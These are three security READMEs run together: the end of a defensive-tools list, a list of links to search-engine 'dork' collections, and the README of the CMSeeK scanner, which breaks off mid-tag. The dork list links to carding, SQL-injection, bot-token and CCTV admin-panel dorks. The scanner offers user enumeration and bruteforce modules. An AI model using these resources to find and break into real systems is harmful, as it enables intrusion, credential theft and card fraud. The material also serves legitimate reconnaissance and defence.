[pfSense](https://www.pfsense.org/) - FreeBSD firewall and router distribution forked from m0n0wall. ## Operating System distributions - [Computer Aided Investigative Environment (CAINE)](https://caine-live.net/) - Italian GNU/Linux live distribution that pre-packages numerous digital forensics and evidence collection tools. - [Security Onion](https://securityonion.net/) - Free and open source GNU/Linux distribution for intrusion detection, enterprise security monitoring, and log management. - [Qubes OS](https://qubes-os.org/) - Desktop environment built atop the Xen hypervisor project that runs each end-user program in its own virtual machine intended to provide strict security controls to constrain the reach of any successful malware exploit. ## Phishing awareness and reporting See also [awesome-pentest § Social Engineering Tools](https://github.com/fabacab/awesome-pentest#social-engineering-tools). - [CertSpotter](https://github.com/SSLMate/certspotter) - Certificate Transparency log monitor from SSLMate that alerts you when a SSL/TLS certificate is issued for one of your domains. - [Gophish](https://getgophish.com/) - Powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. - [King Phisher](https://github.com/securestate/king-phisher) - Tool for testing and promoting user awareness by simulating real world phishing attacks. - [NotifySecurity](https://github.com/certsocietegenerale/NotifySecurity) - Outlook add-in used to help your users to report suspicious e-mails to security teams. - [Phishing Intelligence Engine (PIE)](https://github.com/LogRhythm-Labs/PIE) - Framework that will assist with the detection and response to phishing attacks. - [Swordphish](https://github.com/certsocietegenerale/swordphish-awareness) - Platform allowing to create and manage (fake) phishing campaigns intended to train people in identifying suspicious mails. - [mailspoof](https://github.com/serain/mailspoof) - Scans SPF and DMARC records for issues that could allow email spoofing. - [phishing_catcher](https://github.com/x0rz/phishing_catcher) - Configurable script to watch for issuances of suspicious TLS certificates by domain name in the Certificate Transparency Log (CTL) using the [CertStream](https://certstream.calidog.io/) service. ## Preparedness training and wargaming (Also known as *adversary emulation*, *threat simulation*, or similar.) - [APTSimulator](https://github.com/NextronSystems/APTSimulator) - Toolset to make a system look as if it was the victim of an APT attack. - [Atomic Red Team](https://atomicredteam.io/) - Library of simple, automatable tests to execute for testing security controls. - [BadBlood](https://www.secframe.com/badblood/) - Fills a test (non-production) Windows Domain with data that enables security analysts and engineers to practice using tools to gain an understanding and prescribe to securing Active Directory. - [Caldera](https://caldera.mitre.org/) - Scalable, automated, and extensible adversary emulation platform developed by MITRE. - [Drool](https://www.dns-oarc.net/tools/drool) - Replay DNS traffic from packet capture files and send it to a specified server, such as for simulating DDoS attacks on the DNS and measuring normal DNS querying. - [DumpsterFire](https://github.com/TryCatchHCF/DumpsterFire) - Modular, menu-driven, cross-platform tool for building repeatable, time-delayed, distributed security events for Blue Team drills and sensor/alert mapping. - [Infection Monkey](https://www.guardicore.com/infectionmonkey/) - Open-source breach and attack simulation (BAS) platform that helps you validate existing controls and identify how attackers might exploit your current network security gaps. - [Metta](https://github.com/uber-common/metta) - Automated information security preparedness tool to do adversarial simulation. - [Network Flight Simulator (`flightsim`)](https://github.com/alphasoc/flightsim) - Utility to generate malicious network traffic and help security teams evaluate security controls and audit their network visibility. - [RedHunt OS](https://github.com/redhuntlabs/RedHunt-OS) - Ubuntu-based Open Virtual Appliance (`.ova`) preconfigured with several threat emulation tools as well as a defender's toolkit. - [tcpreplay](https://tcpreplay.appneta.com/) - Suite of free Open Source utilities for editing and replaying previously captured network traffic originally designed to replay malicious traffic patterns to Intrusion Detection/Prevention Systems. ### Post-engagement analysis and reporting - [RedEye](https://cisagov.github.io/RedEye/) - Analytic tool to assist both Red and Blue teams with visualizing and reporting command and control activities, replay and demonstrate attack paths, and more clearly communicate remediation recommendations to stakeholders. ## Security configurations (Also known as *secure-by-default baselines* and *implemented best practices*.) - [Bunkerized-nginx](https://github.com/bunkerity/bunkerized-nginx) - Docker image of an NginX configuration and scripts implementing many defensive techniques for Web sites. ## Security monitoring - [Crossfeed](https://docs.crossfeed.cyber.dhs.gov/) - Continuously enumerates and monitors an organization’s public-facing attack surface in order to discover assets and flag potential security flaws. - [Starbase](https://github.com/JupiterOne/starbase) - Collects assets and relationships from services and systems into an intuitive graph view to offer graph-based security analysis for everyone. ### Endpoint Detection and Response (EDR) - [Wazuh](https://wazuh.com/) - Open source, multiplatform agent-based security monitoring based on a fork of OSSEC HIDS. ### Network Security Monitoring (NSM) See also [awesome-pcaptools](https://github.com/caesar0301/awesome-pcaptools). - [Arkime](https://github.com/arkime/arkime) - Augments your current security infrastructure to store and index network traffic in standard PCAP format, providing fast, indexed access. - [ChopShop](https://github.com/MITRECND/chopshop) - Framework to aid analysts in the creation and execution of pynids-based decoders and detectors of APT tradecraft. - [Maltrail](https://github.com/stamparm/maltrail) - Malicious network traffic detection system. - [OwlH](https://www.owlh.net/) - Helps manage network IDS at scale by visualizing Suricata, Zeek, and Moloch life cycles. - [Real Intelligence Threat Analysis (RITA)](https://github.com/activecm/rita) - Open source framework for network traffic analysis that ingests Zeek logs and detects beaconing, DNS tunneling, and more. - [Respounder](https://github.com/codeexpress/respounder) - Detects the presence of the Responder LLMNR/NBT-NS/MDNS poisoner on a network. - [Snort](https://snort.org/) - Widely-deployed, Free Software IPS capable of real-time packet analysis, traffic logging, and custom rule-based triggers. - [SpoofSpotter](https://github.com/NetSPI/SpoofSpotter) - Catch spoofed NetBIOS Name Service (NBNS) responses and alert to an email or log file. - [Stenographer](https://github.com/google/stenographer) - Full-packet-capture utility for buffering packets to disk for intrusion detection and incident response purposes. - [Suricata](https://suricata-ids.org/) - Free, cross-platform, IDS/IPS with on- and off-line analysis modes and deep packet inspection capabilities that is also scriptable with Lua. - [Tsunami](https://github.com/google/tsunami-security-scanner) - General purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence. - [VAST](https://github.com/tenzir/vast) - Free and open-source network telemetry engine for data-driven security investigations. - [Wireshark](https://www.wireshark.org) - Free and open-source packet analyzer useful for network troubleshooting or forensic netflow analysis. - [Zeek](https://zeek.org/) - Powerful network analysis framework focused on security monitoring, formerly known as Bro. - [netsniff-ng](http://netsniff-ng.org/) - Free and fast GNU/Linux networking toolkit with numerous utilities such as a connection tracking tool (`flowtop`), traffic generator (`trafgen`), and autonomous system (AS) trace route utility (`astraceroute`). ### Security Information and Event Management (SIEM) - [AlienVault OSSIM](https://www.alienvault.com/open-threat-exchange/projects) - Single-server open source SIEM platform featuring asset discovery, asset inventorying, behavioral monitoring, and event correlation, driven by AlienVault Open Threat Exchange (OTX). - [Prelude SIEM OSS](https://www.prelude-siem.org/) - Open source, agentless SIEM with a long history and several commercial variants featuring security event collection, normalization, and alerting from arbitrary log input and numerous popular monitoring tools. ### Service and performance monitoring See also [awesome-sysadmin#monitoring](https://github.com/n1trux/awesome-sysadmin#monitoring). - [Icinga](https://icinga.com/) - Modular redesign of Nagios with pluggable user interfaces and an expanded set of data connectors, collectors, and reporting tools. - [Locust](https://locust.io/) - Open source load testing tool in which you can define user behaviour with Python code and swarm your system with millions of simultaneous users. - [Nagios](https://nagios.org) - Popular network and service monitoring solution and reporting platform. - [OpenNMS](https://opennms.org/) - Free and feature-rich networking monitoring system supporting multiple configurations, a variety of alerting mechanisms (email, XMPP, SMS), and numerous data collection methods (SNMP, HTTP, JDBC, etc). - [osquery](https://github.com/facebook/osquery) - Operating system instrumentation framework for macOS, Windows, and Linux, exposing the OS as a high-performance relational database that can be queried with a SQL-like syntax. - [Zabbix](https://www.zabbix.com/) - Mature, enterprise-level platform to monitor large-scale IT environments. ### Threat hunting (Also known as *hunt teaming* and *threat detection*.) See also [awesome-threat-detection](https://github.com/0x4D31/awesome-threat-detection). - [CimSweep](https://github.com/PowerShellMafia/CimSweep) - Suite of CIM/WMI-based tools enabling remote incident response and hunting operations across all versions of Windows. - [DeepBlueCLI](https://github.com/sans-blue-team/DeepBlueCLI) - PowerShell module for hunt teaming via Windows Event logs. - [GRR Rapid Response](https://github.com/google/grr) - Incident response framework focused on remote live forensics consisting of a Python agent installed on assets and Python-based server infrastructure enabling analysts to quickly triage attacks and perform analysis remotely. - [Hunting ELK (HELK)](https://github.com/Cyb3rWard0g/HELK) - All-in-one Free Software threat hunting stack based on Elasticsearch, Logstash, Kafka, and Kibana with various built-in integrations for analytics including Jupyter Notebook. - [MozDef](https://github.com/mozilla/MozDef) - Automate the security incident handling process and facilitate the real-time activities of incident handlers. - [PSHunt](https://github.com/Infocyte/PSHunt) - PowerShell module designed to scan remote endpoints for indicators of compromise or survey them for more comprehensive information related to state of those systems. - [PSRecon](https://github.com/gfoss/PSRecon) - PSHunt-like tool for analyzing remote Windows systems that also produces a self-contained HTML report of its findings. - [PowerForensics](https://github.com/Invoke-IR/PowerForensics) - All in one PowerShell-based platform to perform live hard disk forensic analysis. - [rastrea2r](https://github.com/rastrea2r/rastrea2r) - Multi-platform tool for triaging suspected IOCs on many endpoints simultaneously and that integrates with antivirus consoles. - [Redline](https://www.fireeye.com/services/freeware/redline.html) - Freeware endpoint auditing and analysis tool that provides host-based investigative capabilities, offered by FireEye, Inc. ## Threat intelligence See also [awesome-threat-intelligence](https://github.com/hslatman/awesome-threat-intelligence). - [AttackerKB](https://attackerkb.com/) - Free and public crowdsourced vulnerability assessment platform to help prioritize high-risk patch application and combat vulnerability fatigue. - [DATA](https://github.com/hadojae/DATA) - Credential phish analysis and automation tool that can accept suspected phishing URLs directly or trigger on observed network traffic containing such a URL. - [Forager](https://github.com/opensourcesec/Forager) - Multi-threaded threat intelligence gathering built with Python3 featuring simple text-based configuration and data storage for ease of use and data portability. - [GRASSMARLIN](https://github.com/nsacyber/GRASSMARLIN) - Provides IP network situational awareness of industrial control systems (ICS) and Supervisory Control and Data Acquisition (SCADA) by passively mapping, accounting for, and reporting on your ICS/SCADA network topology and endpoints. - [MLSec Combine](https://github.com/mlsecproject/combine) - Gather and combine multiple threat intelligence feed sources into one customizable, standardized CSV-based format. - [Malware Information Sharing Platform and Threat Sharing (MISP)](https://misp-project.org/) - Open source software solution for collecting, storing, distributing and sharing cyber security indicators. - [Open Source Vulnerabilities (OSV)](https://osv.dev/) - Vulnerability database and triage infrastructure for open source projects aimed at helping both open source maintainers and consumers of open source. - [Sigma](https://github.com/Neo23x0/sigma) - Generic signature format for SIEM systems, offering an open signature format that allows you to describe relevant log events in a straightforward manner. - [Threat Bus](https://github.com/tenzir/threatbus) - Threat intelligence dissemination layer to connect security tools through a distributed publish/subscribe message broker. - [ThreatIngestor](https://github.com/InQuest/ThreatIngestor) - Extendable tool to extract and aggregate IOCs from threat feeds including Twitter, RSS feeds, or other sources. - [Unfetter](https://nsacyber.github.io/unfetter/) - Identifies defensive gaps in security posture by leveraging Mitre's ATT&CK framework. - [Viper](https://github.com/viper-framework/viper) - Binary analysis and management framework enabling easy organization of malware and exploit samples. - [YARA](https://github.com/VirusTotal/yara) - Tool aimed at (but not limited to) helping malware researchers to identify and classify malware samples, described as "the pattern matching swiss army knife" for file patterns and signatures. ### Fingerprinting - [HASSH](https://github.com/salesforce/hassh) - Network fingerprinting standard which can be used to identify specific client and server SSH implementations. - [JA3](https://ja3er.com/) - Extracts SSL/TLS handshake settings for fingerprinting and communicating about a given TLS implementation. ### Threat signature packages and collections - [ESET's Malware IoCs](https://github.com/eset/malware-ioc) - Indicators of Compromises (IOCs) derived from ESET's various investigations. - [FireEye's Red Team Tool Countermeasures](https://github.com/fireeye/red_team_tool_countermeasures) - Collection of Snort and YARA rules to detect attacks carried out with FireEye's own Red Team tools, first released after FireEye disclosed a breach in December 2020. - [FireEye's Sunburst Countermeasures](https://github.com/fireeye/sunburst_countermeasures) - Collection of IoC in various languages for detecting backdoored SolarWinds Orion NMS activities and related vulnerabilities. - [YARA Rules](https://github.com/Yara-Rules/rules) - Project covering the need for IT security researchers to have a single repository where different Yara signatures are compiled, classified and kept as up to date as possible. ## Tor Onion service defenses See also [awesome-tor](https://github.com/ajvb/awesome-tor). - [OnionBalance](https://onionbalance.readthedocs.io/) - Provides load-balancing while also making Onion services more resilient and reliable by eliminating single points-of-failure. - [Vanguards](https://github.com/mikeperry-tor/vanguards) - Version 3 Onion service guard discovery attack mitigation script (intended for eventual inclusion in Tor core). ## Transport-layer defenses - [Certbot](https://certbot.eff.org/) - Free tool to automate the issuance and renewal of TLS certificates from the [LetsEncrypt Root CA](https://letsencrypt.org/) with plugins that configure various Web and e-mail server software. - [MITMEngine](https://github.com/cloudflare/mitmengine) - Golang library for server-side detection of TLS interception events. - [Tor](https://torproject.org/) - Censorship circumvention and anonymizing overlay network providing distributed, cryptographically verified name services (`.onion` domains) to enhance publisher privacy and service availability. ### Overlay and Virtual Private Networks (VPNs) - [Firezone](https://www.firezone.dev/) - Self-hosted VPN server built on WireGuard that supports MFA and SSO. - [Headscale](https://github.com/juanfont/headscale) - Open source, self-hosted implementation of the Tailscale control server. - [IPsec VPN Server Auto Setup Scripts](https://github.com/hwdsl2/setup-ipsec-vpn) - Scripts to build your own IPsec VPN server, with IPsec/L2TP, Cisco IPsec and IKEv2. - [Innernet](https://github.com/tonarino/innernet) - Free Software private network system that uses WireGuard under the hood, made to be self-hosted. - [Nebula](https://github.com/slackhq/nebula) - Completely open source and self-hosted, scalable overlay networking tool with a focus on performance, simplicity, and security, inspired by tinc. - [OpenVPN](https://openvpn.net/) - Longstanding Free Software traditional SSL/TLS-based virtual private network. - [OpenZITI](https://openziti.github.io/) - Open source initiative focused on bringing Zero Trust to any application via an overlay network, tunelling applications, and numerous SDKs. - [Tailscale](https://tailscale.com/) - Managed freemium mesh VPN service built on top of WireGuard. - [WireGuard](https://www.wireguard.com/) - Extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. - [tinc](https://tinc-vpn.org/) - Free Software mesh VPN implemented entirely in userspace that supports expandable network space, bridged ethernet segments, and more. ## macOS-based defenses See also [drduh/macOS-Security-and-Privacy-Guide](https://github.com/drduh/macOS-Security-and-Privacy-Guide). - [BlockBlock](https://objective-see.com/products/blockblock.html) - Monitors common persistence locations and alerts whenever a persistent component is added, which helps to detect and prevent malware installation. - [LuLu](https://objective-see.com/products/lulu.html) - Free macOS firewall. - [Santa](https://github.com/google/santa) - Keep track of binaries that are naughty or nice in an allow/deny-listing system for macOS. - [Stronghold](https://github.com/alichtman/stronghold) - Easily configure macOS security settings from the terminal. - [macOS Fortress](https://github.com/essandess/macOS-Fortress) - Automated configuration of kernel-level, OS-level, and client-level security features including privatizing proxying and anti-virus scanning for macOS. ## Windows-based defenses See also [awesome-windows#security](https://github.com/Awesome-Windows/Awesome#security) and [awesome-windows-domain-hardening](https://github.com/PaulSec/awesome-windows-domain-hardening). - [CobaltStrikeScan](https://github.com/Apr4h/CobaltStrikeScan) - Scan files or process memory for Cobalt Strike beacons and parse their configuration. - [HardenTools](https://github.com/securitywithoutborders/hardentools) - Utility that disables a number of risky Windows features. - [NotRuler](https://github.com/sensepost/notruler) - Detect both client-side rules and VBScript enabled forms used by the [Ruler](https://github.com/sensepost/ruler) attack tool when attempting to compromise a Microsoft Exchange server. - [Sandboxie](https://www.sandboxie.com/) - Free and open source general purpose Windows application sandboxing utility. - [Sigcheck](https://docs.microsoft.com/en-us/sysinternals/downloads/sigcheck) - Audit a Windows host's root certificate store against Microsoft's [Certificate Trust List (CTL)](https://docs.microsoft.com/en-us/windows/desktop/SecCrypto/certificate-trust-list-overview). - [Sticky Keys Slayer](https://github.com/linuz/Sticky-Keys-Slayer) - Establishes a Windows RDP session from a list of hostnames and scans for accessibility tools backdoors, alerting if one is discovered. - [Windows Secure Host Baseline](https://github.com/nsacyber/Windows-Secure-Host-Baseline) - Group Policy objects, compliance checks, and configuration tools that provide an automated and flexible approach for securely deploying and maintaining the latest releases of Windows 10. - [WMI Monitor](https://github.com/realparisi/WMI_Monitor) - Log newly created WMI consumers and processes to the Windows Application event log. ### Active Directory - [Active Directory Control Paths](https://github.com/ANSSI-FR/AD-control-paths) - Visualize and graph Active Directory permission configs ("control relations") to audit questions such as "Who can read the CEO's email?" and similar. - [PingCastle](https://www.pingcastle.com/) - Active Directory vulnerability detection and reporting tool. - [PlumHound](https://github.com/PlumHound/PlumHound) - More effectively use BloodHoundAD in continual security life-cycles by utilizing its pathfinding engine to identify Active Directory security vulnerabilities. ## License [![CC-BY](https://mirrors.creativecommons.org/presskit/buttons/88x31/svg/by.svg)](https://creativecommons.org/licenses/by/4.0/) This work is licensed under a [Creative Commons Attribution 4.0 International License](https://creativecommons.org/licenses/by/4.0/).
## OG Repo https://github.com/cipher387/Dorks-collections-list <h1>Dorks collections list</h1> <p>List of Github repositories and articles with list of dorks for different search engines</p> <div align="center"> <img alt="GitHub stars" src="https://img.shields.io/github/stars/cipher387/Dorks-collections-list"> <img alt="GitHub forks" src="https://img.shields.io/github/forks/cipher387/Dorks-collections-list"> [![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/dwyl/esta/issues) [![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fcipher387%2FDorks-collections-list%2F&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://hits.seeyoufarm.com) </div> <h1>Table of contents</h1> <a href="#duckduckdorks">DuckDuckGo dorks</a></br> <a href="#githubdorks">Github dorks</a></br> <a href="#shodandorks">Shodan dorks</a></br> <a href="#censysdorks">Censys dorks</a></br> <a href="#virustotaldorks">Virus Total dorks</a></br> <a href="#binaryedgedorks">Binary Edge dorks</a></br> <a href="#yandexdorks">Yandex dorks</a></br> <a href="#googledorks">Google dorks</a></br> <a href="#oniondorks">Onion dorks</a></br> <a href="#cctvdorks">CCTV dorks</a></br> <a href="#backlinkdorks">Backlink dorks</a></br> <a href="#tokendorks">Token dorks</a></br> <a href="#hiddenfilesdorks">Hidden files dorks</a></br> <a href="#linkedindorks">Linkedin dorks (X-Ray)</a></br> <a href="#cardingdorks">Carding dorks </a></br> <a href="#gamingdorks">Gaming dorks </a></br> <a href="#shoppingdorks">Cryptocurrency dorks</a></br> <a href="#cryptodorks">Shopping dorks</a></br> <a href="#bugbountydorks">Bug Bounty dorks</a></br> <a href="#hidddenfilesdorks">Hidden files dorks</a></br> <a href="#adminpaneldorks">Admin panel dorks</a></br> <a href="#gitdorks">GIT dorks</a></br> <a href="#logdorks">Log files dorks</a></br> <a href="#cmsdorks">CMS dorks</a></br> <a href="#cloudinstancedorks">Cloud Instance dorks</a></br> <a href="#wikidorks">"Wiki" dorks</a></br> <a href="#awstatsdorks">Awstats dorks</a></br> <a href="#automatedorks">Tools to automate the work with dorks</a></br> <a href="#browserextensions">Broswer extensions</a></br> <a href="#onlinetools">Online tools to work with dorks</a></br> <a name="duckduckdorks"></a> <h2>DuckDuckGo dorks</h2> https://github.com/d34dfr4m3/goDuck <a name="githubdorks"></a> <h2>Github dorks</h2> https://github.com/techgaun/github-dorks</br> https://github.com/jcesarstef/ghhdb-Github-Hacking-Database</br> https://github.com/H4CK3RT3CH/github-dorks</br> https://github.com/Vaidik-pandya/Github_recon_dorks/blob/main/gitdork.txt (for finding files) <i>Many dorks for Github can also be used when searching other code hosting services (Bitbucket, Gitlab, Codeberg etc). You can use the special Google Custom Search Engine to search 20 code hosting services at a time https://cipher387.github.io/code_repository_google_custom_search_engines/</i> <a name="shodandorks"></a> <h2>Shodan dorks</h2> https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/1-part-100-article/google/Shodan%20Queries.txt</br> https://github.com/humblelad/Shodan-Dorks</br> https://github.com/AustrianEnergyCERT/ICS_IoT_Shodan_Dorks</br> https://github.com/lothos612/shodan</br> https://github.com/jakejarvis/awesome-shodan-queries</br> https://github.com/IFLinfosec/shodan-dorks</br> https://www.osintme.com/index.php/2021/01/16/ultimate-osint-with-shodan-100-great-shodan-queries/</br> <a name="censysdorks"></a> <h2>Censys dorks</h2> https://github.com/thehappydinoa/awesome-censys-queries</br> <a name="virustotaldorks"></a> <h2>Virus Total dorks</h2> https://github.com/Neo23x0/vti-dorks</br> <a name="binaryedgedorks"></a> <h2>Binary Edge + Shodan + Google</h2> https://github.com/iGotRootSRC/Dorkers</br> <a name="yandexdorks"></a> <h2>Google, Bing, Ecosia, Yahoo or Yandex</h2> https://github.com/Zarcolio/sitedorks <a name="googledorks"></a> <h1>Google dorks</h1> https://github.com/BullsEye0/google_dork_list</br> https://github.com/sushiwushi/bug-bounty-dorks</br> https://github.com/rootac355/SQL-injection-dorks-list</br> https://github.com/unexpectedBy/SQLi-Dork-Repository</br> https://github.com/thomasdesr/Google-dorks</br> https://github.com/arimogi/Google-Dorks</br> https://github.com/aleedhillon/7000-Google-Dork-List</br> <a name="oniondorks"></a> <h2>Onion dorks</h2> <i>Universal for Google, Bing etc</i></br> Dorks for searching .onion sites saved in oniline proxies services https://github.com/cipher387/Dorks-collections-list/blob/main/onion.txt</br> <a name="cctvdorks"></a> <h2>CCTV dorks</h2> <i>Universal for Google, Bing etc</i></br> Dorks for search CCTV cams admin panels https://github.com/cipher387/Dorks-collections-list/blob/main/cctv.txt</br> Camera dorks from @tru_1veresk https://github.com/iveresk/camera_dorks/blob/main/dorks.json</br> Google Dorks of Live Webcams, CCTV etc. (from d4msec) https://d4msec.wordpress.com/2015/09/05/google-dorks-of-live-webcams-cctv-etc-google-unsecured-ip-cameras/</br> <a name="backlinkdorks"></a> <h2>Backlink dorks</h2> (SEO Terminology) <i>Universal for Google, Bing etc</i></br> List https://github.com/alfazzafashion/Backlink-dorks</br> Explanation https://www.techywebtech.com/2021/08/backlink-dorks.html</br> 1150 dorks for forum hunting https://www.blackhatworld.com/seo/get-backlinks-yourself-1150-dorks-for-forum-hunting.380843/ <a name="tokendorks"></a> <h2>Token dorks</h2> <i>Universal for Google, Bing etc</i></br> Discord Bots Tokens https://github.com/traumatism/get-discord-bots-tokens-with-google <a name="hiddenfilesdorks"></a> <h2>Hidden files dorks</h2> <i>Universal for Google, Bing etc</i></br> https://github.com/0xAbbarhSF/Info-Sec-Dork-List/blob/main/hidden_files_dork.txt <a name="adminpaneldorks"></a> <h2>Admin panel dorks</h2> <i>Universal for Google, Bing etc</i></br> https://github.com/cyberm0n/admin-panel-dorks/blob/main/dorks.txt <a name="linkedindorks"></a> <h2>Linkedin dorks (Google X-Ray search for Linkedin)</h2> <i>Universal for Google, Bing etc</i></br> Linkedin X-Ray search queries and tools https://github.com/krlabs/linkedin-dorks <a name="cardingdorks"></a> <h2>Carding dorks</h2> <i>Universal for Google, Bing etc</i></br> 1170 carding dorks https://pastebin.com/GYXLqgU0</br> 17K carding dorks 2019 https://pastebin.com/fgdZxy74 <a name="gamingdorks"></a> <h2>Gaming dorks</h2> <i>Universal for Google, Bing etc</i></br> 7K Gaming Dorks From My Shop https://pastebin.com/ajuixpY2</br> Minecraft https://pastebin.com/ssNgdTkC <a name="shoppingdorks"></a> <h2>Shopping dorks</h2> <i>Universal for Google, Bing etc</i></br> 10k Amazon dorks https://pastebin.com/1HrmzFre</br> 820 shopping Dorks for SQLi https://pastebin.com/1kED1FDX <a name="cryptodorks"></a> <h2>Cryptocurrency dorks</h2> 15K dorks to find vulnerable pages related to cryptocurrency exchanges, cryptocurrency payments, etc. https://www.scribd.com/document/384770530/15k-Btc-Dorks <a name="bugbountydorks"></a> <h2>Bug Bounty Dorks</h2> <i>Universal for Google, Bing etc</i></br> https://github.com/hackingbharat/bug-bounty-dorks-archive/blob/main/bbdorks</br> https://github.com/Vinod-1122/bug-bounty-dorks/blob/main/Dorks.txt <a name="gitdorks"></a> <h2>GIT files Dorks</h2> <i>Universal for Google, Bing etc</i></br> https://github.com/Proviesec/google-dorks/blob/main/google-dorks-for-git-files.txt <a name="logdorks"></a> <h2>Log files Dorks</h2> <i>Universal for Google, Bing etc</i></br> https://github.com/Proviesec/google-dorks/blob/main/google-dorks-best-log.txt <a name="cmsdorks"></a> <h2>CMS Dorks</h2> <i>Universal for Google, Bing etc</i></br> Wordpress https://pastebin.com/A9dsmgHQ</br> Magento https://pastebin.com/k75Y2QhF</br> Joomla https://pastebin.com/vVQFTzVC</br> <a name="cloudinstancedorks"></a> <h2>Cloud instance dorks</h2> <i>Universal for Google, Bing etc</i></br> Amazon AWS https://github.com/cipher387/Dorks-collections-list/blob/main/aws.txt </br> https://github.com/Proviesec/google-dorks/blob/main/google-dorks-for-finding-aws-s3.txt Google Cloud https://github.com/cipher387/Dorks-collections-list/blob/main/googslecloud.txt Microsoft Azure https://github.com/cipher387/Dorks-collections-list/blob/main/azure.txt <a name="wikidorks"></a> <h2>Dorks for sites based by wiki engines</h2> <i>Universal for Google, Bing etc</i></br> "Wiki" dorks https://github.com/Proviesec/google-dorks/blob/main/google-dorks-for-wikipedia.txt <a name="awstatsdorks"></a> <h2>Awstats dorks</h2> <i>Universal for Google, Bing etc</i></br> "Stats" dorks https://github.com/Proviesec/google-dorks/blob/main/google-dorks-for-stats.txt <a name="automatedorks"></a> <h2>Tools to automate the work with dorks</h2> Fast Google Dorks Scan https://github.com/IvanGlinkin/Fast-Google-Dorks-Scan </br> 0xDork https://github.com/rlyonheart/0xdork </br> SDorker https://github.com/TheSpeedX/SDorker </br> ASHOK (osint swiss knife) https://github.com/ankitdobhal/Ashok </br> Padago (Automate Google Hacking Database scraping and searching) https://github.com/opsdisk/pagodo</br> Katana (Python tool that automates Google Hacking/Dorking and supports Tor) https://github.com/TebbaaX/Katana </br> GO Dork (fast google search result scanner) https://github.com/dwisiswant0/go-dork</br> Snitch https://github.com/Smaash/snitch</br> Dorks Eye https://github.com/BullsEye0/dorks-eye</br> SQLI Dorks generator https://github.com/Zold1/sqli-dorks-generator</br> DSH - Discord Server Hunter https://github.com/falkensmz/dsh</br> Dork hunter https://github.com/six2dez/dorks_hunter <a name="browserextensions"></a> <h2>Browser extenstions</h2> Google Dork Builder Firefox Add-on https://addons.mozilla.org/ru/firefox/addon/google-dork-builder/ </br> <a name="onlinetools"></a> <h2>Online tools to work with dorks</h2> Dorksearch https://dorksearch.com/</br> FilePhish https://cartographia.github.io/FilePhish/</br> BugBounty Helper https://dorks.faisalahmed.me </br> Google Hacking tool from Pentest Tools https://pentest-tools.com/information-gathering/google-hacking</br> <hr> Twitter — https://twitter.com/cyb_detective Telegram — https://t.me/cybdetective Github — https://github.com/cipher387 <hr>
<p align='center'> <img src="https://i.imgur.com/n2U6nVH.png" alt="Logo"> <br> <img src="https://img.shields.io/badge/Version-1.0.5-brightgreen.svg?style=style=flat-square" alt="version"> <img src="https://img.shields.io/badge/python-3-orange.svg?style=style=flat-square" alt="Python Version"> <img src="https://img.shields.io/aur/license/yaourt.svg?style=style=flat-square" alt="License"> </p> ## What is a CMS? > A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: *WordPress, Joomla, Drupal etc*. ## Release History ``` - Version 1.0.5 [19-07-2018] - Version 1.0.4 [17-07-2018] - Version 1.0.3 [06-07-2018] - Version 1.0.2 [06-07-2018] - Version 1.0.1 [19-06-2018] - Version 1.0.0 [15-06-2018] ``` [Changelog File](https://github.com/Tuhinshubhra/CMSeeK/blob/master/CHANGELOG) ## Functions Of CMSeek: - Basic CMS Detection of over 20 CMS - Drupal version detection - Advanced Wordpress Scans - Detects Version - User Enumeration - Plugins Enumeration - Theme Enumeration - Detects Users (3 Detection Methods) - Looks for Version Vulnerabilities and much more! - Advanced Joomla Scans - Version detection - Backup files finder - Admin page finder - Core vulnerability detection - Directory listing check - Config leak detection - Various other checks - Modular bruteforce system - Use pre made bruteforce modules or create your own and integrate with it ## Requirements and Compatibility: CMSeeK is built using **python3**, you will need python3 to run this tool and is compitable with **unix based systems** as of now. Windows support will be added later. CMSeeK relies on **git** for auto-update so make sure git is installed. ## Installation and Usage: It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands: - git clone `https://github.com/Tuhinshubhra/CMSeeK` - cd CMSeeK For guided scanning: - python3 cmseek.py Else: - python3 cmseek.py -u <target_url> [...] The rest should be pretty self explanotory. ## Checking For Update: You can check for update either from the main menu or use `python3 cmseek.py --update` to check for update and apply auto update. P.S: Please make sure you have `git` installed, CMSeeK uses git to apply auto update. ## Detection Methods: CMSeek uses mainly 2 things for detection: - HTTP Headers - Page Source Code ## Supported CMSs: CMSeeK currently can detect **22** CMSs, you can find the list on [cmss.py](https://github.com/Tuhinshubhra/CMSeeK/blob/master/cmseekdb/cmss.py) file which is present in the `cmseekdb` directory. All the cmss are stored in the following way: ``` cmsID = { 'name':'Name Of CMS', 'url':'Official URL of the CMS', 'vd':'Version Detection (0 for no, 1 for yes)', 'deeps':'Deep Scan (0 for no 1 for yes)' } ``` ## Scan Result: All of your scan results are stored in a json file named `cms.json`, you can find the logs inside the `Result\<Target Site>` directory, and as of the bruteforce results they're stored in a txt file under the site's result directory as well. Here is an example of the json report log: ![Json Log](https://i.imgur.com/5dA9jQg.png) ## Bruteforce Modules: CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this: 1. Add a comment exactly like this `# <Name Of The CMS> Bruteforce module`. This will help CMSeeK to know the name of the CMS using regex 2. Add another comment `### cmseekbruteforcemodule`, this will help CMSeeK to know it is a module 3. Copy and paste the module in the `brutecms` directory under CMSeeK's directory 4. Open CMSeeK and Rebuild Cache using `U` as the input in the first menu. 5. If everything is done right you'll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK. <p align='center'> <img alt="Cache Rebuild Screenshot" width="400px" src="https://i.imgur.com/2Brl7pl.png" /> </p> ## Need More Reasons To Use CMSeeK? If not anything you can always enjoy exiting CMSeeK *(please don't)*, it will bid you goodbye in a random goodbye message in various languages. Also you can try reading comments in the code those are pretty random and weird!!! ## Screenshots: <p align="center"> <img alt="Main Menu" width="600px" src="https://i.imgur.com/KdRSYzP.png" 